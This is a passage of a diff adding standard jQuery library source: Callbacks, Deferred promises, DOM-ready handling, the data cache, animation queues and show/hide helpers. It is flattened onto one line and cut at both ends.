elem.contentDocument != null && + + // Support: IE 11+ + // elements with no `data` attribute has an object + // `contentDocument` with a `null` prototype. + getProto( elem.contentDocument ) ) { + + return elem.contentDocument; + } + + // Support: IE 9 - 11 only, iOS 7 only, Android Browser <=4.3 only + // Treat the template element as a regular one in browsers that + // don't support it. + if ( nodeName( elem, "template" ) ) { + elem = elem.content || elem; + } + + return jQuery.merge( [], elem.childNodes ); + } +}, function( name, fn ) { + jQuery.fn[ name ] = function( until, selector ) { + var matched = jQuery.map( this, fn, until ); + + if ( name.slice( -5 ) !== "Until" ) { + selector = until; + } + + if ( selector && typeof selector === "string" ) { + matched = jQuery.filter( selector, matched ); + } + + if ( this.length > 1 ) { + + // Remove duplicates + if ( !guaranteedUnique[ name ] ) { + jQuery.uniqueSort( matched ); + } + + // Reverse order for parents* and prev-derivatives + if ( rparentsprev.test( name ) ) { + matched.reverse(); + } + } + + return this.pushStack( matched ); + }; +} ); +var rnothtmlwhite = ( /[^\x20\t\r\n\f]+/g ); + + + +// Convert String-formatted options into Object-formatted ones +function createOptions( options ) { + var object = {}; + jQuery.each( options.match( rnothtmlwhite ) || [], function( _, flag ) { + object[ flag ] = true; + } ); + return object; +} + +/* + * Create a callback list using the following parameters: + * + * options: an optional list of space-separated options that will change how + * the callback list behaves or a more traditional option object + * + * By default a callback list will act like an event callback list and can be + * "fired" multiple times. + * + * Possible options: + * + * once: will ensure the callback list can only be fired once (like a Deferred) + * + * memory: will keep track of previous values and will call any callback added + * after the list has been fired right away with the latest "memorized" + * values (like a Deferred) + * + * unique: will ensure a callback can only be added once (no duplicate in the list) + * + * stopOnFalse: interrupt callings when a callback returns false + * + */ +jQuery.Callbacks = function( options ) { + + // Convert options from String-formatted to Object-formatted if needed + // (we check in cache first) + options = typeof options === "string" ? + createOptions( options ) : + jQuery.extend( {}, options ); + + var // Flag to know if list is currently firing + firing, + + // Last fire value for non-forgettable lists + memory, + + // Flag to know if list was already fired + fired, + + // Flag to prevent firing + locked, + + // Actual callback list + list = [], + + // Queue of execution data for repeatable lists + queue = [], + + // Index of currently firing callback (modified by add/remove as needed) + firingIndex = -1, + + // Fire callbacks + fire = function() { + + // Enforce single-firing + locked = locked || options.once; + + // Execute callbacks for all pending executions, + // respecting firingIndex overrides and runtime changes + fired = firing = true; + for ( ; queue.length; firingIndex = -1 ) { + memory = queue.shift(); + while ( ++firingIndex < list.length ) { + + // Run callback and check for early termination + if ( list[ firingIndex ].apply( memory[ 0 ], memory[ 1 ] ) === false && + options.stopOnFalse ) { + + // Jump to end and forget the data so .add doesn't re-fire + firingIndex = list.length; + memory = false; + } + } + } + + // Forget the data if we're done with it + if ( !options.memory ) { + memory = false; + } + + firing = false; + + // Clean up if we're done firing for good + if ( locked ) { + + // Keep an empty list if we have data for future add calls + if ( memory ) { + list = []; + + // Otherwise, this object is spent + } else { + list = ""; + } + } + }, + + // Actual Callbacks object + self = { + + // Add a callback or a collection of callbacks to the list + add: function() { + if ( list ) { + + // If we have memory from a past run, we should fire after adding + if ( memory && !firing ) { + firingIndex = list.length - 1; + queue.push( memory ); + } + + ( function add( args ) { + jQuery.each( args, function( _, arg ) { + if ( isFunction( arg ) ) { + if ( !options.unique || !self.has( arg ) ) { + list.push( arg ); + } + } else if ( arg && arg.length && toType( arg ) !== "string" ) { + + // Inspect recursively + add( arg ); + } + } ); + } )( arguments ); + + if ( memory && !firing ) { + fire(); + } + } + return this; + }, + + // Remove a callback from the list + remove: function() { + jQuery.each( arguments, function( _, arg ) { + var index; + while ( ( index = jQuery.inArray( arg, list, index ) ) > -1 ) { + list.splice( index, 1 ); + + // Handle firing indexes + if ( index <= firingIndex ) { + firingIndex--; + } + } + } ); + return this; + }, + + // Check if a given callback is in the list. + // If no argument is given, return whether or not list has callbacks attached. + has: function( fn ) { + return fn ? + jQuery.inArray( fn, list ) > -1 : + list.length > 0; + }, + + // Remove all callbacks from the list + empty: function() { + if ( list ) { + list = []; + } + return this; + }, + + // Disable .fire and .add + // Abort any current/pending executions + // Clear all callbacks and values + disable: function() { + locked = queue = []; + list = memory = ""; + return this; + }, + disabled: function() { + return !list; + }, + + // Disable .fire + // Also disable .add unless we have memory (since it would have no effect) + // Abort any pending executions + lock: function() { + locked = queue = []; + if ( !memory && !firing ) { + list = memory = ""; + } + return this; + }, + locked: function() { + return !!locked; + }, + + // Call all callbacks with the given context and arguments + fireWith: function( context, args ) { + if ( !locked ) { + args = args || []; + args = [ context, args.slice ? args.slice() : args ]; + queue.push( args ); + if ( !firing ) { + fire(); + } + } + return this; + }, + + // Call all the callbacks with the given arguments + fire: function() { + self.fireWith( this, arguments ); + return this; + }, + + // To know if the callbacks have already been called at least once + fired: function() { + return !!fired; + } + }; + + return self; +}; + + +function Identity( v ) { + return v; +} +function Thrower( ex ) { + throw ex; +} + +function adoptValue( value, resolve, reject, noValue ) { + var method; + + try { + + // Check for promise aspect first to privilege synchronous behavior + if ( value && isFunction( ( method = value.promise ) ) ) { + method.call( value ).done( resolve ).fail( reject ); + + // Other thenables + } else if ( value && isFunction( ( method = value.then ) ) ) { + method.call( value, resolve, reject ); + + // Other non-thenables + } else { + + // Control `resolve` arguments by letting Array#slice cast boolean `noValue` to integer: + // * false: [ value ].slice( 0 ) => resolve( value ) + // * true: [ value ].slice( 1 ) => resolve() + resolve.apply( undefined, [ value ].slice( noValue ) ); + } + + // For Promises/A+, convert exceptions into rejections + // Since jQuery.when doesn't unwrap thenables, we can skip the extra checks appearing in + // Deferred#then to conditionally suppress rejection. + } catch ( value ) { + + // Support: Android 4.0 only + // Strict mode functions invoked without .call/.apply get global-object context + reject.apply( undefined, [ value ] ); + } +} + +jQuery.extend( { + + Deferred: function( func ) { + var tuples = [ + + // action, add listener, callbacks, + // ... .then handlers, argument index, [final state] + [ "notify", "progress", jQuery.Callbacks( "memory" ), + jQuery.Callbacks( "memory" ), 2 ], + [ "resolve", "done", jQuery.Callbacks( "once memory" ), + jQuery.Callbacks( "once memory" ), 0, "resolved" ], + [ "reject", "fail", jQuery.Callbacks( "once memory" ), + jQuery.Callbacks( "once memory" ), 1, "rejected" ] + ], + state = "pending", + promise = { + state: function() { + return state; + }, + always: function() { + deferred.done( arguments ).fail( arguments ); + return this; + }, + "catch": function( fn ) { + return promise.then( null, fn ); + }, + + // Keep pipe for back-compat + pipe: function( /* fnDone, fnFail, fnProgress */ ) { + var fns = arguments; + + return jQuery.Deferred( function( newDefer ) { + jQuery.each( tuples, function( _i, tuple ) { + + // Map tuples (progress, done, fail) to arguments (done, fail, progress) + var fn = isFunction( fns[ tuple[ 4 ] ] ) && fns[ tuple[ 4 ] ]; + + // deferred.progress(function() { bind to newDefer or newDefer.notify }) + // deferred.done(function() { bind to newDefer or newDefer.resolve }) + // deferred.fail(function() { bind to newDefer or newDefer.reject }) + deferred[ tuple[ 1 ] ]( function() { + var returned = fn && fn.apply( this, arguments ); + if ( returned && isFunction( returned.promise ) ) { + returned.promise() + .progress( newDefer.notify ) + .done( newDefer.resolve ) + .fail( newDefer.reject ); + } else { + newDefer[ tuple[ 0 ] + "With" ]( + this, + fn ? [ returned ] : arguments + ); + } + } ); + } ); + fns = null; + } ).promise(); + }, + then: function( onFulfilled, onRejected, onProgress ) { + var maxDepth = 0; + function resolve( depth, deferred, handler, special ) { + return function() { + var that = this, + args = arguments, + mightThrow = function() { + var returned, then; + + // Support: Promises/A+ section 2.3.3.3.3 + // https://promisesaplus.com/#point-59 + // Ignore double-resolution attempts + if ( depth < maxDepth ) { + return; + } + + returned = handler.apply( that, args ); + + // Support: Promises/A+ section 2.3.1 + // https://promisesaplus.com/#point-48 + if ( returned === deferred.promise() ) { + throw new TypeError( "Thenable self-resolution" ); + } + + // Support: Promises/A+ sections 2.3.3.1, 3.5 + // https://promisesaplus.com/#point-54 + // https://promisesaplus.com/#point-75 + // Retrieve `then` only once + then = returned && + + // Support: Promises/A+ section 2.3.4 + // https://promisesaplus.com/#point-64 + // Only check objects and functions for thenability + ( typeof returned === "object" || + typeof returned === "function" ) && + returned.then; + + // Handle a returned thenable + if ( isFunction( then ) ) { + + // Special processors (notify) just wait for resolution + if ( special ) { + then.call( + returned, + resolve( maxDepth, deferred, Identity, special ), + resolve( maxDepth, deferred, Thrower, special ) + ); + + // Normal processors (resolve) also hook into progress + } else { + + // ...and disregard older resolution values + maxDepth++; + + then.call( + returned, + resolve( maxDepth, deferred, Identity, special ), + resolve( maxDepth, deferred, Thrower, special ), + resolve( maxDepth, deferred, Identity, + deferred.notifyWith ) + ); + } + + // Handle all other returned values + } else { + + // Only substitute handlers pass on context + // and multiple values (non-spec behavior) + if ( handler !== Identity ) { + that = undefined; + args = [ returned ]; + } + + // Process the value(s) + // Default process is resolve + ( special || deferred.resolveWith )( that, args ); + } + }, + + // Only normal processors (resolve) catch and reject exceptions + process = special ? + mightThrow : + function() { + try { + mightThrow(); + } catch ( e ) { + + if ( jQuery.Deferred.exceptionHook ) { + jQuery.Deferred.exceptionHook( e, + process.stackTrace ); + } + + // Support: Promises/A+ section 2.3.3.3.4.1 + // https://promisesaplus.com/#point-61 + // Ignore post-resolution exceptions + if ( depth + 1 >= maxDepth ) { + + // Only substitute handlers pass on context + // and multiple values (non-spec behavior) + if ( handler !== Thrower ) { + that = undefined; + args = [ e ]; + } + + deferred.rejectWith( that, args ); + } + } + }; + + // Support: Promises/A+ section 2.3.3.3.1 + // https://promisesaplus.com/#point-57 + // Re-resolve promises immediately to dodge false rejection from + // subsequent errors + if ( depth ) { + process(); + } else { + + // Call an optional hook to record the stack, in case of exception + // since it's otherwise lost when execution goes async + if ( jQuery.Deferred.getStackHook ) { + process.stackTrace = jQuery.Deferred.getStackHook(); + } + window.setTimeout( process ); + } + }; + } + + return jQuery.Deferred( function( newDefer ) { + + // progress_handlers.add( ... ) + tuples[ 0 ][ 3 ].add( + resolve( + 0, + newDefer, + isFunction( onProgress ) ? + onProgress : + Identity, + newDefer.notifyWith + ) + ); + + // fulfilled_handlers.add( ... ) + tuples[ 1 ][ 3 ].add( + resolve( + 0, + newDefer, + isFunction( onFulfilled ) ? + onFulfilled : + Identity + ) + ); + + // rejected_handlers.add( ... ) + tuples[ 2 ][ 3 ].add( + resolve( + 0, + newDefer, + isFunction( onRejected ) ? + onRejected : + Thrower + ) + ); + } ).promise(); + }, + + // Get a promise for this deferred + // If obj is provided, the promise aspect is added to the object + promise: function( obj ) { + return obj != null ? jQuery.extend( obj, promise ) : promise; + } + }, + deferred = {}; + + // Add list-specific methods + jQuery.each( tuples, function( i, tuple ) { + var list = tuple[ 2 ], + stateString = tuple[ 5 ]; + + // promise.progress = list.add + // promise.done = list.add + // promise.fail = list.add + promise[ tuple[ 1 ] ] = list.add; + + // Handle state + if ( stateString ) { + list.add( + function() { + + // state = "resolved" (i.e., fulfilled) + // state = "rejected" + state = stateString; + }, + + // rejected_callbacks.disable + // fulfilled_callbacks.disable + tuples[ 3 - i ][ 2 ].disable, + + // rejected_handlers.disable + // fulfilled_handlers.disable + tuples[ 3 - i ][ 3 ].disable, + + // progress_callbacks.lock + tuples[ 0 ][ 2 ].lock, + + // progress_handlers.lock + tuples[ 0 ][ 3 ].lock + ); + } + + // progress_handlers.fire + // fulfilled_handlers.fire + // rejected_handlers.fire + list.add( tuple[ 3 ].fire ); + + // deferred.notify = function() { deferred.notifyWith(...) } + // deferred.resolve = function() { deferred.resolveWith(...) } + // deferred.reject = function() { deferred.rejectWith(...) } + deferred[ tuple[ 0 ] ] = function() { + deferred[ tuple[ 0 ] + "With" ]( this === deferred ? undefined : this, arguments ); + return this; + }; + + // deferred.notifyWith = list.fireWith + // deferred.resolveWith = list.fireWith + // deferred.rejectWith = list.fireWith + deferred[ tuple[ 0 ] + "With" ] = list.fireWith; + } ); + + // Make the deferred a promise + promise.promise( deferred ); + + // Call given func if any + if ( func ) { + func.call( deferred, deferred ); + } + + // All done! + return deferred; + }, + + // Deferred helper + when: function( singleValue ) { + var + + // count of uncompleted subordinates + remaining = arguments.length, + + // count of unprocessed arguments + i = remaining, + + // subordinate fulfillment data + resolveContexts = Array( i ), + resolveValues = slice.call( arguments ), + + // the master Deferred + master = jQuery.Deferred(), + + // subordinate callback factory + updateFunc = function( i ) { + return function( value ) { + resolveContexts[ i ] = this; + resolveValues[ i ] = arguments.length > 1 ? slice.call( arguments ) : value; + if ( !( --remaining ) ) { + master.resolveWith( resolveContexts, resolveValues ); + } + }; + }; + + // Single- and empty arguments are adopted like Promise.resolve + if ( remaining <= 1 ) { + adoptValue( singleValue, master.done( updateFunc( i ) ).resolve, master.reject, + !remaining ); + + // Use .then() to unwrap secondary thenables (cf. gh-3000) + if ( master.state() === "pending" || + isFunction( resolveValues[ i ] && resolveValues[ i ].then ) ) { + + return master.then(); + } + } + + // Multiple arguments are aggregated like Promise.all array elements + while ( i-- ) { + adoptValue( resolveValues[ i ], updateFunc( i ), master.reject ); + } + + return master.promise(); + } +} ); + + +// These usually indicate a programmer mistake during development, +// warn about them ASAP rather than swallowing them by default. +var rerrorNames = /^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/; + +jQuery.Deferred.exceptionHook = function( error, stack ) { + + // Support: IE 8 - 9 only + // Console exists when dev tools are open, which can happen at any time + if ( window.console && window.console.warn && error && rerrorNames.test( error.name ) ) { + window.console.warn( "jQuery.Deferred exception: " + error.message, error.stack, stack ); + } +}; + + + + +jQuery.readyException = function( error ) { + window.setTimeout( function() { + throw error; + } ); +}; + + + + +// The deferred used on DOM ready +var readyList = jQuery.Deferred(); + +jQuery.fn.ready = function( fn ) { + + readyList + .then( fn ) + + // Wrap jQuery.readyException in a function so that the lookup + // happens at the time of error handling instead of callback + // registration. + .catch( function( error ) { + jQuery.readyException( error ); + } ); + + return this; +}; + +jQuery.extend( { + + // Is the DOM ready to be used? Set to true once it occurs. + isReady: false, + + // A counter to track how many items to wait for before + // the ready event fires. See #6781 + readyWait: 1, + + // Handle when the DOM is ready + ready: function( wait ) { + + // Abort if there are pending holds or we're already ready + if ( wait === true ? --jQuery.readyWait : jQuery.isReady ) { + return; + } + + // Remember that the DOM is ready + jQuery.isReady = true; + + // If a normal DOM Ready event fired, decrement, and wait if need be + if ( wait !== true && --jQuery.readyWait > 0 ) { + return; + } + + // If there are functions bound, to execute + readyList.resolveWith( document, [ jQuery ] ); + } +} ); + +jQuery.ready.then = readyList.then; + +// The ready event handler and self cleanup method +function completed() { + document.removeEventListener( "DOMContentLoaded", completed ); + window.removeEventListener( "load", completed ); + jQuery.ready(); +} + +// Catch cases where $(document).ready() is called +// after the browser event has already occurred. +// Support: IE <=9 - 10 only +// Older IE sometimes signals "interactive" too soon +if ( document.readyState === "complete" || + ( document.readyState !== "loading" && !document.documentElement.doScroll ) ) { + + // Handle it asynchronously to allow scripts the opportunity to delay ready + window.setTimeout( jQuery.ready ); + +} else { + + // Use the handy event callback + document.addEventListener( "DOMContentLoaded", completed ); + + // A fallback to window.onload, that will always work + window.addEventListener( "load", completed ); +} + + + + +// Multifunctional method to get and set values of a collection +// The value/s can optionally be executed if it's a function +var access = function( elems, fn, key, value, chainable, emptyGet, raw ) { + var i = 0, + len = elems.length, + bulk = key == null; + + // Sets many values + if ( toType( key ) === "object" ) { + chainable = true; + for ( i in key ) { + access( elems, fn, i, key[ i ], true, emptyGet, raw ); + } + + // Sets one value + } else if ( value !== undefined ) { + chainable = true; + + if ( !isFunction( value ) ) { + raw = true; + } + + if ( bulk ) { + + // Bulk operations run against the entire set + if ( raw ) { + fn.call( elems, value ); + fn = null; + + // ...except when executing function values + } else { + bulk = fn; + fn = function( elem, _key, value ) { + return bulk.call( jQuery( elem ), value ); + }; + } + } + + if ( fn ) { + for ( ; i < len; i++ ) { + fn( + elems[ i ], key, raw ? + value : + value.call( elems[ i ], i, fn( elems[ i ], key ) ) + ); + } + } + } + + if ( chainable ) { + return elems; + } + + // Gets + if ( bulk ) { + return fn.call( elems ); + } + + return len ? fn( elems[ 0 ], key ) : emptyGet; +}; + + +// Matches dashed string for camelizing +var rmsPrefix = /^-ms-/, + rdashAlpha = /-([a-z])/g; + +// Used by camelCase as callback to replace() +function fcamelCase( _all, letter ) { + return letter.toUpperCase(); +} + +// Convert dashed to camelCase; used by the css and data modules +// Support: IE <=9 - 11, Edge 12 - 15 +// Microsoft forgot to hump their vendor prefix (#9572) +function camelCase( string ) { + return string.replace( rmsPrefix, "ms-" ).replace( rdashAlpha, fcamelCase ); +} +var acceptData = function( owner ) { + + // Accepts only: + // - Node + // - Node.ELEMENT_NODE + // - Node.DOCUMENT_NODE + // - Object + // - Any + return owner.nodeType === 1 || owner.nodeType === 9 || !( +owner.nodeType ); +}; + + + + +function Data() { + this.expando = jQuery.expando + Data.uid++; +} + +Data.uid = 1; + +Data.prototype = { + + cache: function( owner ) { + + // Check if the owner object already has a cache + var value = owner[ this.expando ]; + + // If not, create one + if ( !value ) { + value = {}; + + // We can accept data for non-element nodes in modern browsers, + // but we should not, see #8335. + // Always return an empty object. + if ( acceptData( owner ) ) { + + // If it is a node unlikely to be stringify-ed or looped over + // use plain assignment + if ( owner.nodeType ) { + owner[ this.expando ] = value; + + // Otherwise secure it in a non-enumerable property + // configurable must be true to allow the property to be + // deleted when data is removed + } else { + Object.defineProperty( owner, this.expando, { + value: value, + configurable: true + } ); + } + } + } + + return value; + }, + set: function( owner, data, value ) { + var prop, + cache = this.cache( owner ); + + // Handle: [ owner, key, value ] args + // Always use camelCase key (gh-2257) + if ( typeof data === "string" ) { + cache[ camelCase( data ) ] = value; + + // Handle: [ owner, { properties } ] args + } else { + + // Copy the properties one-by-one to the cache object + for ( prop in data ) { + cache[ camelCase( prop ) ] = data[ prop ]; + } + } + return cache; + }, + get: function( owner, key ) { + return key === undefined ? + this.cache( owner ) : + + // Always use camelCase key (gh-2257) + owner[ this.expando ] && owner[ this.expando ][ camelCase( key ) ]; + }, + access: function( owner, key, value ) { + + // In cases where either: + // + // 1. No key was specified + // 2. A string key was specified, but no value provided + // + // Take the "read" path and allow the get method to determine + // which value to return, respectively either: + // + // 1. The entire cache object + // 2. The data stored at the key + // + if ( key === undefined || + ( ( key && typeof key === "string" ) && value === undefined ) ) { + + return this.get( owner, key ); + } + + // When the key is not a string, or both a key and value + // are specified, set or extend (existing objects) with either: + // + // 1. An object of properties + // 2. A key and value + // + this.set( owner, key, value ); + + // Since the "set" path can have two possible entry points + // return the expected data based on which path was taken[*] + return value !== undefined ? value : key; + }, + remove: function( owner, key ) { + var i, + cache = owner[ this.expando ]; + + if ( cache === undefined ) { + return; + } + + if ( key !== undefined ) { + + // Support array or space separated string of keys + if ( Array.isArray( key ) ) { + + // If key is an array of keys... + // We always set camelCase keys, so remove that. + key = key.map( camelCase ); + } else { + key = camelCase( key ); + + // If a key with the spaces exists, use it. + // Otherwise, create an array by matching non-whitespace + key = key in cache ? + [ key ] : + ( key.match( rnothtmlwhite ) || [] ); + } + + i = key.length; + + while ( i-- ) { + delete cache[ key[ i ] ]; + } + } + + // Remove the expando if there's no more data + if ( key === undefined || jQuery.isEmptyObject( cache ) ) { + + // Support: Chrome <=35 - 45 + // Webkit & Blink performance suffers when deleting properties + // from DOM nodes, so set to undefined instead + // https://bugs.chromium.org/p/chromium/issues/detail?id=378607 (bug restricted) + if ( owner.nodeType ) { + owner[ this.expando ] = undefined; + } else { + delete owner[ this.expando ]; + } + } + }, + hasData: function( owner ) { + var cache = owner[ this.expando ]; + return cache !== undefined && !jQuery.isEmptyObject( cache ); + } +}; +var dataPriv = new Data(); + +var dataUser = new Data(); + + + +// Implementation Summary +// +// 1. Enforce API surface and semantic compatibility with 1.9.x branch +// 2. Improve the module's maintainability by reducing the storage +// paths to a single mechanism. +// 3. Use the same single mechanism to support "private" and "user" data. +// 4. _Never_ expose "private" data to user code (TODO: Drop _data, _removeData) +// 5. Avoid exposing implementation details on user objects (eg. expando properties) +// 6. Provide a clear path for implementation upgrade to WeakMap in 2014 + +var rbrace = /^(?:\{[\w\W]*\}|\[[\w\W]*\])$/, + rmultiDash = /[A-Z]/g; + +function getData( data ) { + if ( data === "true" ) { + return true; + } + + if ( data === "false" ) { + return false; + } + + if ( data === "null" ) { + return null; + } + + // Only convert to a number if it doesn't change the string + if ( data === +data + "" ) { + return +data; + } + + if ( rbrace.test( data ) ) { + return JSON.parse( data ); + } + + return data; +} + +function dataAttr( elem, key, data ) { + var name; + + // If nothing was found internally, try to fetch any + // data from the HTML5 data-* attribute + if ( data === undefined && elem.nodeType === 1 ) { + name = "data-" + key.replace( rmultiDash, "-$&" ).toLowerCase(); + data = elem.getAttribute( name ); + + if ( typeof data === "string" ) { + try { + data = getData( data ); + } catch ( e ) {} + + // Make sure we set the data so it isn't changed later + dataUser.set( elem, key, data ); + } else { + data = undefined; + } + } + return data; +} + +jQuery.extend( { + hasData: function( elem ) { + return dataUser.hasData( elem ) || dataPriv.hasData( elem ); + }, + + data: function( elem, name, data ) { + return dataUser.access( elem, name, data ); + }, + + removeData: function( elem, name ) { + dataUser.remove( elem, name ); + }, + + // TODO: Now that all calls to _data and _removeData have been replaced + // with direct calls to dataPriv methods, these can be deprecated. + _data: function( elem, name, data ) { + return dataPriv.access( elem, name, data ); + }, + + _removeData: function( elem, name ) { + dataPriv.remove( elem, name ); + } +} ); + +jQuery.fn.extend( { + data: function( key, value ) { + var i, name, data, + elem = this[ 0 ], + attrs = elem && elem.attributes; + + // Gets all values + if ( key === undefined ) { + if ( this.length ) { + data = dataUser.get( elem ); + + if ( elem.nodeType === 1 && !dataPriv.get( elem, "hasDataAttrs" ) ) { + i = attrs.length; + while ( i-- ) { + + // Support: IE 11 only + // The attrs elements can be null (#14894) + if ( attrs[ i ] ) { + name = attrs[ i ].name; + if ( name.indexOf( "data-" ) === 0 ) { + name = camelCase( name.slice( 5 ) ); + dataAttr( elem, name, data[ name ] ); + } + } + } + dataPriv.set( elem, "hasDataAttrs", true ); + } + } + + return data; + } + + // Sets multiple values + if ( typeof key === "object" ) { + return this.each( function() { + dataUser.set( this, key ); + } ); + } + + return access( this, function( value ) { + var data; + + // The calling jQuery object (element matches) is not empty + // (and therefore has an element appears at this[ 0 ]) and the + // `value` parameter was not undefined. An empty jQuery object + // will result in `undefined` for elem = this[ 0 ] which will + // throw an exception if an attempt to read a data cache is made. + if ( elem && value === undefined ) { + + // Attempt to get data from the cache + // The key will always be camelCased in Data + data = dataUser.get( elem, key ); + if ( data !== undefined ) { + return data; + } + + // Attempt to "discover" the data in + // HTML5 custom data-* attrs + data = dataAttr( elem, key ); + if ( data !== undefined ) { + return data; + } + + // We tried really hard, but the data doesn't exist. + return; + } + + // Set the data... + this.each( function() { + + // We always store the camelCased key + dataUser.set( this, key, value ); + } ); + }, null, value, arguments.length > 1, null, true ); + }, + + removeData: function( key ) { + return this.each( function() { + dataUser.remove( this, key ); + } ); + } +} ); + + +jQuery.extend( { + queue: function( elem, type, data ) { + var queue; + + if ( elem ) { + type = ( type || "fx" ) + "queue"; + queue = dataPriv.get( elem, type ); + + // Speed up dequeue by getting out quickly if this is just a lookup + if ( data ) { + if ( !queue || Array.isArray( data ) ) { + queue = dataPriv.access( elem, type, jQuery.makeArray( data ) ); + } else { + queue.push( data ); + } + } + return queue || []; + } + }, + + dequeue: function( elem, type ) { + type = type || "fx"; + + var queue = jQuery.queue( elem, type ), + startLength = queue.length, + fn = queue.shift(), + hooks = jQuery._queueHooks( elem, type ), + next = function() { + jQuery.dequeue( elem, type ); + }; + + // If the fx queue is dequeued, always remove the progress sentinel + if ( fn === "inprogress" ) { + fn = queue.shift(); + startLength--; + } + + if ( fn ) { + + // Add a progress sentinel to prevent the fx queue from being + // automatically dequeued + if ( type === "fx" ) { + queue.unshift( "inprogress" ); + } + + // Clear up the last queue stop function + delete hooks.stop; + fn.call( elem, next, hooks ); + } + + if ( !startLength && hooks ) { + hooks.empty.fire(); + } + }, + + // Not public - generate a queueHooks object, or return the current one + _queueHooks: function( elem, type ) { + var key = type + "queueHooks"; + return dataPriv.get( elem, key ) || dataPriv.access( elem, key, { + empty: jQuery.Callbacks( "once memory" ).add( function() { + dataPriv.remove( elem, [ type + "queue", key ] ); + } ) + } ); + } +} ); + +jQuery.fn.extend( { + queue: function( type, data ) { + var setter = 2; + + if ( typeof type !== "string" ) { + data = type; + type = "fx"; + setter--; + } + + if ( arguments.length < setter ) { + return jQuery.queue( this[ 0 ], type ); + } + + return data === undefined ? + this : + this.each( function() { + var queue = jQuery.queue( this, type, data ); + + // Ensure a hooks for this queue + jQuery._queueHooks( this, type ); + + if ( type === "fx" && queue[ 0 ] !== "inprogress" ) { + jQuery.dequeue( this, type ); + } + } ); + }, + dequeue: function( type ) { + return this.each( function() { + jQuery.dequeue( this, type ); + } ); + }, + clearQueue: function( type ) { + return this.queue( type || "fx", [] ); + }, + + // Get a promise resolved when queues of a certain type + // are emptied (fx is the type by default) + promise: function( type, obj ) { + var tmp, + count = 1, + defer = jQuery.Deferred(), + elements = this, + i = this.length, + resolve = function() { + if ( !( --count ) ) { + defer.resolveWith( elements, [ elements ] ); + } + }; + + if ( typeof type !== "string" ) { + obj = type; + type = undefined; + } + type = type || "fx"; + + while ( i-- ) { + tmp = dataPriv.get( elements[ i ], type + "queueHooks" ); + if ( tmp && tmp.empty ) { + count++; + tmp.empty.add( resolve ); + } + } + resolve(); + return defer.promise( obj ); + } +} ); +var pnum = ( /[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/ ).source; + +var rcssNum = new RegExp( "^(?:([+-])=|)(" + pnum + ")([a-z%]*)$", "i" ); + + +var cssExpand = [ "Top", "Right", "Bottom", "Left" ]; + +var documentElement = document.documentElement; + + + + var isAttached = function( elem ) { + return jQuery.contains( elem.ownerDocument, elem ); + }, + composed = { composed: true }; + + // Support: IE 9 - 11+, Edge 12 - 18+, iOS 10.0 - 10.2 only + // Check attachment across shadow DOM boundaries when possible (gh-3504) + // Support: iOS 10.0-10.2 only + // Early iOS 10 versions support `attachShadow` but not `getRootNode`, + // leading to errors. We need to check for `getRootNode`. + if ( documentElement.getRootNode ) { + isAttached = function( elem ) { + return jQuery.contains( elem.ownerDocument, elem ) || + elem.getRootNode( composed ) === elem.ownerDocument; + }; + } +var isHiddenWithinTree = function( elem, el ) { + + // isHiddenWithinTree might be called from jQuery#filter function; + // in that case, element will be second argument + elem = el || elem; + + // Inline style trumps all + return elem.style.display === "none" || + elem.style.display === "" && + + // Otherwise, check computed style + // Support: Firefox <=43 - 45 + // Disconnected elements can have computed display: none, so first confirm that elem is + // in the document. + isAttached( elem ) && + + jQuery.css( elem, "display" ) === "none"; + }; + + + +function adjustCSS( elem, prop, valueParts, tween ) { + var adjusted, scale, + maxIterations = 20, + currentValue = tween ? + function() { + return tween.cur(); + } : + function() { + return jQuery.css( elem, prop, "" ); + }, + initial = currentValue(), + unit = valueParts && valueParts[ 3 ] || ( jQuery.cssNumber[ prop ] ? "" : "px" ), + + // Starting value computation is required for potential unit mismatches + initialInUnit = elem.nodeType && + ( jQuery.cssNumber[ prop ] || unit !== "px" && +initial ) && + rcssNum.exec( jQuery.css( elem, prop ) ); + + if ( initialInUnit && initialInUnit[ 3 ] !== unit ) { + + // Support: Firefox <=54 + // Halve the iteration target value to prevent interference from CSS upper bounds (gh-2144) + initial = initial / 2; + + // Trust units reported by jQuery.css + unit = unit || initialInUnit[ 3 ]; + + // Iteratively approximate from a nonzero starting point + initialInUnit = +initial || 1; + + while ( maxIterations-- ) { + + // Evaluate and update our best guess (doubling guesses that zero out). + // Finish if the scale equals or crosses 1 (making the old*new product non-positive). + jQuery.style( elem, prop, initialInUnit + unit ); + if ( ( 1 - scale ) * ( 1 - ( scale = currentValue() / initial || 0.5 ) ) <= 0 ) { + maxIterations = 0; + } + initialInUnit = initialInUnit / scale; + + } + + initialInUnit = initialInUnit * 2; + jQuery.style( elem, prop, initialInUnit + unit ); + + // Make sure we update the tween properties later on + valueParts = valueParts || []; + } + + if ( valueParts ) { + initialInUnit = +initialInUnit || +initial || 0; + + // Apply relative offset (+=/-=) if specified + adjusted = valueParts[ 1 ] ? + initialInUnit + ( valueParts[ 1 ] + 1 ) * valueParts[ 2 ] : + +valueParts[ 2 ]; + if ( tween ) { + tween.unit = unit; + tween.start = initialInUnit; + tween.end = adjusted; + } + } + return adjusted; +} + + +var defaultDisplayMap = {}; + +function getDefaultDisplay( elem ) { + var temp, + doc = elem.ownerDocument, + nodeName = elem.nodeName, + display = defaultDisplayMap[ nodeName ]; + + if ( display ) { + return display; + } + + temp = doc.body.appendChild( doc.createElement( nodeName ) ); + display = jQuery.css( temp, "display" ); + + temp.parentNode.removeChild( temp ); + + if ( display === "none" ) { + display = "block"; + } + defaultDisplayMap[ nodeName ] = display; + + return display; +} + +function showHide( elements, show ) { + var display, elem, + values = [], + index = 0, + length = elements.length; + + // Determine new display value for elements that need to change + for ( ; index < length; index++ ) { + elem = elements[ index ]; + if ( !elem.style ) { + continue; + } + + display = elem.style.display; + if ( show ) { + + // Since we force visibility upon cascade-hidden elements, an immediate (and slow) + // check is required in this first loop unless we have a nonempty display value (either + // inline or about-to-be-restored) + if ( display === "none" ) { + values[ index ] = dataPriv.get( elem, "display" ) || null; + if ( !values[ index ] ) { + elem.style.display = ""; + } + } + if ( elem.style.display === "" && isHiddenWithinTree( elem ) ) { + values[ index ] = getDefaultDisplay( elem ); + } + } else { + if ( display !== "none" ) { + values[ index ] = "none"; + + // Remember what we're overwriting + dataPriv.set( elem, "display", display ); + } + } + } + + // Set the display of the elements in a second loop to avoid constant reflow + for ( index = 0; index < length; index++ ) { + if ( values[ index ] != null ) { + elements[ index ].style.display = values[ index ]; + } + } + + return elements; +} + +jQuery.fn.extend( { + show: function() { + return showHide( this, true ); + 